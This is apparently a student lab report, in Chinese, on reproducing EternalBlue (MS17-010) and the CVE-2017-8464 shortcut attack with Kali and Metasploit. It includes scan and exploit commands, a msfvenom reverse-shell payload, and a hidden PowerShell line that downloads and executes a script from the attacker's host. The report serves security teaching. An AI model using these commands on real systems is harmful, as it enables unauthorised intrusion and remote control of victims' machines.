信息系统安全——基于 KALI 和 Metasploit 的渗透测试

实验 2  基于 KALI  Metasploit 的渗透测试

2.1 实验名称

《基于 KALI  Metasploit 的渗透测试》

2.2 实验目的

1 、熟悉渗透测试方法

2 、熟悉渗透测试工具 Kali  Metasploit 的使用

2.3 实验步骤及内容

1 、安装 Kali 系统

2 、选择 Kali  1-2 种攻击工具,记录攻击的主要步骤和攻击结果截图

攻击一:使用 MSF 复现“永恒之蓝”漏洞

实验环境:Win7(关闭防火墙,开启 SMB 服务);

Kali Linuxmetasploit-framework 6.2.26

1  启动 Metasploit

终端里输入 msfconsole

2  查询利用模块

终端里输入 search ms17_010 ,可以看到有哪些模块可以利用

3  使用探测模块

终端内输入 use auxiliary/scanner/smb/smb_ms17_010

4  设置探测范围

终端内输入 show options ,在这里需要配置一个 RHOSTS

终端内输入 set rhosts 192.168.3.0/24 设置扫描当前网段 或可以设置范围 set rhosts 192.168.3.1- 192.168.3.10

5  开始探测

终端内输入 run 执行探测。

根据上图我们可以看到 192.168.3.8   IP 的机器可能存在漏洞。

6  开始漏洞利用

首先在终端里输入 search ms17_010 ,使用模块 use

exploit/windows/smb/ms17_010_eternalblue

7  配置利用模块

配置模块 show options  配置靶机 set rhost 192.168.3.8  这里 IP 填第五步探测到的 IP 

8  执行攻击

在终端里输入 run 。看到 win 说明攻击成功,拿到 meterpreter

攻击二:“震网三代”反弹 shell

实验环境:Win10(关闭防火墙);

Kali Linuxmetasploit-framework 6.2.26

1 、使用 MSF 创建一个后门

msf  内 输 入 : msfvenom  -p  windows/x64/meterpreter/reverse_tcp  lhost= 192.168.3.23 lport=4456 -fpsh-reflection>/var/www/html/link.ps1

2 、在 kali 下开启 apache2

终端内输入:service apache2 start

3 、在受控机上创建快捷方式

powershell       -windowstyle       hidden       -exec       bypass       -c       "IEX       (New-Object

Net.WebClient).DownloadString('http://192.168.204.135/link.ps1');test.ps1"

4  回到 MSF 终端配置监听

msf 内输入: use exploit/multi/handler

5  配置 payload

set payload windows/x64/meterpreter/reverse_tcp

msf 中输入:show options  配置 payload

设置 LHOST  LPORT maf 中输入:

set lhost <当前机器 ip>  设置 LHOST

set lport <未被占用的端口>  设置 LPORT

6 、执行监听

msf 中输入:run 或者 exploit

进入靶机执行我们在靶机上创建的快捷方式,稍等片刻获取 meterpreter

2.4 实验关键过程及其分析

攻击一:使用 MSF 复现“永恒之蓝 ”漏洞

CVE-2017-0144 ,即永恒之蓝,最早爆发于 2017  4  14 日晚,是一种利用 Windows 系统的 SMB 协议漏洞来获取系统的最高权限, 以此来控制被入侵的计算机。甚至于 2017 5  12 日, 不法分子通过改造永恒之蓝”制作了勒索病毒,使全世界大范围内遭受了勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。

SMB 是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过 SMB 协议可以在计算机间共享文件、打印机、命名管道等资源, 电脑上的网上邻居就是靠 SMB  实现的;SMB 协议工作在应用层和会话层,可以用在 TCP/IP 协议之上,SMB 使用 TCP139端口和 TCP445 端口。

SMB 工作原理:

1)首先客户端发送一个 SMB negport  请求数据报,,并列出它所支持的所有 SMB 的协 议版本。服务器收到请求消息后响应请求,并列出希望使用的 SMB 协议版本。如果没有可以使用的协议版本则返回 0XFFFFH ,结束通信。

2)协议确定后,客户端进程向服务器发起一个用户或共享的认证,这个过程是通过发送 SessetupX 请求数据包实现的。客户端发送一对用户名和密码或一个简单密码到服务器,然后通过服务器发送一个 SessetupX 应答数据包来允许或拒绝本次连接。

3)当客户端和服务器完成了磋商和认证之后,它会发送一个 Tcon TconX SMB 数据报 并列出它想访问的网络资源的名称,之后会发送一个 TconX 应答数据报以表示此次连接是否接收或拒绝。

4)连接到相应资源后,SMB 客户端就能够通过open SMB 打开一个文件,通过 read SMB 读取文件,通过write SMB 写入文件,通过 close SMB 关闭文件。

永恒之蓝是在 Windows  SMB 服务处理 SMB v1 请求时发生的漏洞,这个漏洞导致攻 击者在目标系统上可以执行任意代码。通过永恒之蓝漏洞会扫描开放 445 文件共享端口的 Windows 机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。

攻击二:“震网三代 ”反弹 shell

2017  6  13 日,微软官方发布编号为 CVE-2017-8464 的漏洞公告,官方介绍 Windows 系统在解析快捷方式时存在远程执行任意代码的高危漏洞,黑客可以通过 U 盘、网络共享 等途径触发漏洞,完全控制用户系统,安全风险高危传播的载体一般是 lnklnk  windows 系统内应用程序快捷方式文件的文件类型后缀名。被攻击机插入存在攻击 lnk  U 盘后会反 shell ,哪怕是被隔离的内网,也可以在不上网的情况下被攻击。

这种漏洞通过创建恶意快捷方式,包含恶意执行脚本,点击恶意快捷方式,导致本机中病毒,并且被远控。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mfbz.cn/a/300848.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

JSON Crack数据可视化工具结合内网穿透实现公网访问

文章目录 1. 在Linux上使用Docker安装JSONCrack2. 安装Cpolar内网穿透工具3. 配置JSON Crack界面公网地址4. 远程访问 JSONCrack 界面5. 固定 JSONCrack公网地址 JSON Crack 是一款免费的开源数据可视化应用程序&#xff0c;能够将 JSON、YAML、XML、CSV 等数据格式可视化为交互…

OpenCV-18图像的翻转和旋转

一、图像的翻转 使用API---cv.flip&#xff08;src, flipCode&#xff09; flipCode 0表示上下翻转 flipCode > 0表示左右翻转 flipCode < 0上下 左右翻转 或者使用np的翻转src[: : -1,: : -1]实现上下翻转。 示例代码如下&#xff1a; import cv2 import numpy…

网站被篡改怎么办,如何进行有效的防护

随着互联网的飞速发展&#xff0c;信息传播的速度和范围得到了极大的提升。然而&#xff0c;这也为网页篡改行为提供了可乘之机。网页被篡改不仅会损害网站的形象&#xff0c;还可能对用户造成误导&#xff0c;甚至导致安全漏洞。因此&#xff0c;网页防篡改技术成为了网络安全…

LINUX——动/静态库

加油加油~ 目录&#xff1a; 动/静态库是什么&#xff1f; .o文件是什么&#xff1f; 以gcc编译器为例&#xff0c;查看xxx.i xxx.s xxx.o文件 生成test.i文件(预处理) 生成test.s文件(编译) 生成test.o文件(汇编) 生成可执行程序(链接)&#xff1a; 小结&#xff1a…

Docker 部署

文章目录 1.部署Nginx2.部署Tomcat 1.部署Nginx 首先我们可以使用下面命令来搜索镜像&#xff08;网站查询也可以&#xff09; # 搜索有关Nginx的镜像 docker search nginx# 下载镜像 docker pull nginx# 运行 docker run -d --name nginx01 -p 3344:80 nginx# -d 后台运行 #…

第一次上传仓库

第一步 第二步 git clone 地址 第三步 放到克隆下来的那个文件夹 第四步 上传到地址里面 如下操作 1,git status //显示分支状态 2,git add . //上传所有 3,git commit -am "第一次上传" //名字 4,git push

Saprk SQL基础知识

一.Spark SQL基本介绍 1.什么是Spark SQL Spark SQL是Spark多种组件中其中一个,主要是用于处理大规模的[结构化数据] Spark SQL的特点: 1).融合性:既可以使用SQL语句,也可以编写代码,同时支持两者混合使用. 2).统一的数据访问:Spark SQL用统一的API对接不同的数据源 3).H…

在ultralytics中实现obb检测,官方团队做了哪些修改?

在最新的在ultralytics中,官方团队已经提供了obb检测功能,并发布了相应的预训练模型,其具体使用可以参考。https://blog.csdn.net/a486259/article/details/134557389 1、网络结构 1.1 OBB(Detect) 在ultralytics\nn\modules\head.py中,实现了OBB head,用于在网络head…

欧拉函数算法总结

知识概览 欧拉函数为1~n中与n互质的数的个数。假设一个数N分解质因数后的结果为 则欧拉函数 这可以用容斥原理来证明。 欧拉函数的应用 欧拉定理&#xff1a;若a与n互质&#xff0c;则。 费马小定理&#xff1a;欧拉定理中的n为质数p时&#xff0c;可以得到若a与p互质&#xff…

Hadoop精选18道面试题(附回答思路)

1.简述Hadoop1和Hadoop2的架构异同 HDFS HA(High Availablity)一旦Active节点出现故障&#xff0c;就可以立即切换到Standby节点&#xff0c;避免了单点故障问题。加入了对zookeeper支持实现比较可靠的高可用。YARN将MapReduce1.0中的资源管理调度功能分离出来形成了YARN&…

Apollo 9.0搭建问题记录

虚拟机安装 可以看这个&#xff1a;https://blog.csdn.net/qq_45138078/article/details/129815408 写的很详细 内存 为了学习 Apollo &#xff0c;所以只是使用了虚拟机&#xff0c;内存得大一点&#xff08;128G&#xff09;&#xff0c;第一次&#xff0c;就是因为分配内…

iptables 规则配置,docker 场景配置

常用命令&#xff1a; -- 创建链 iptables -N WHITELIST_LX-- 清空链 iptables -F WHITELIST_LX-- 查看规则&#xff0c;编号 iptables -nL --line-number-- 查看生效列表 iptables -L -v -n-- 删除规则 iptables -D INPUT <number> 注意观察编号注&#xff1a;firewalld…

图表分析网页模版 大数据可视化大屏电子沙盘合集

项目基于html/css/js&#xff0c;包含行业&#xff1a; 智慧政务 智慧社区 金融行业 智慧交通 智慧门店 智慧大厅 智慧物流 智慧医疗 通用模板 大数据分析平台 项目包含功能 (部分)&#xff1a; 实时数据K线图&#xff08;可自由配置多种行业模式&#xff09; 可切换式大屏展…

【办公软件】手机当电脑摄像头Iriun Webcam软件安装与试用

家里电脑是台式的没有摄像头&#xff0c;但老安卓手机有一台。本来想用小爱摄像头做电脑摄像头&#xff0c;但是发现像素有点差&#xff0c;捣鼓了半天没成功。看网上别人都用旧手机来当电脑摄像头&#xff0c;并且也能使用音频&#xff0c;所以还是用旧手机做摄像头比较香。 …

YOLO蒸馏原理篇之---MGD、CWD蒸馏

一、MGD蒸馏 论文地址:https://arxiv.org/abs/2205.01529 论文翻译:https://mp.weixin.qq.com/s/FSvo3ns2maTpiTTWsE91kQ 1.1 摘要 知识蒸馏已成功应用于各种任务。当前的蒸馏算法通常通过模仿教师的输出来提高学生的表现。本文表明,教师还可以通过指导学生的特征恢复来提…

苹果MacOS12系统 Monterey最新正式版下载 MacOS12系统镜像包

macOS 12 Monterey是苹果公司最新发布的操作系统&#xff0c;为Mac用户带来了更强大、更智能的功能和体验。 这个版本引入了许多令人兴奋的新特性&#xff0c;其中包括革命性的Universal Control功能&#xff0c;让你可以无缝地在Mac和iPad之间进行操作。只需将iPad放在Mac附近…

【sklearn练习】datasets的使用

一、数据集分类 1、fetch类的数据集&#xff1a; 以 "fetch" 开头的数据集&#xff0c;这些数据集通常不包含在 scikit-learn 的标准安装中&#xff0c;需要从远程服务器上下载。这些数据集通常比标准数据集更大&#xff0c;因此在使用它们之前&#xff0c;需要通过…

Linux第10步_通过终端挂载和卸载U盘

学习完“通过终端查看U盘文件”后&#xff0c;我们需要接着学习“通过终端挂载和卸载U盘”。主要是挂载U盘&#xff0c;它的用处很大&#xff0c;目的是通过命令来访问U盘。由于U盘的名字有很多种&#xff0c;为了便于访问&#xff0c;我们把将U盘的第一分区挂载到udisk目录下&…

图神经网络|5.消息传递的计算方法 6.多层GNN的作用

5.消息传递的计算方法 边的存放方式 注意&#xff0c;在实际的边的实现方式中&#xff0c;并不是以邻接矩阵来进行实现的&#xff0c;这是因为在图的更新中&#xff0c;用邻接矩阵进行更新所占用的时间开销相对大&#xff0c;二是因为领接矩阵占用的空间大&#xff08;N方&am…

【MySQL】视图,外连接内连接子查询简单介绍及面试笔试案例题

目录 一 视图 1.1视图是什么 1.2 创建视图 1.3 查看视图(两种) 1.4 修改视图(两种) 1.5 删除视图 二 外连接&内连接&子查询介绍 2.1 外连接 2.2 内连接 2.3 子查询 三 外连接&内连接&子查询案例 3.1 了解表结构与数据 3.2 案例题目 四 思维导图…
最新文章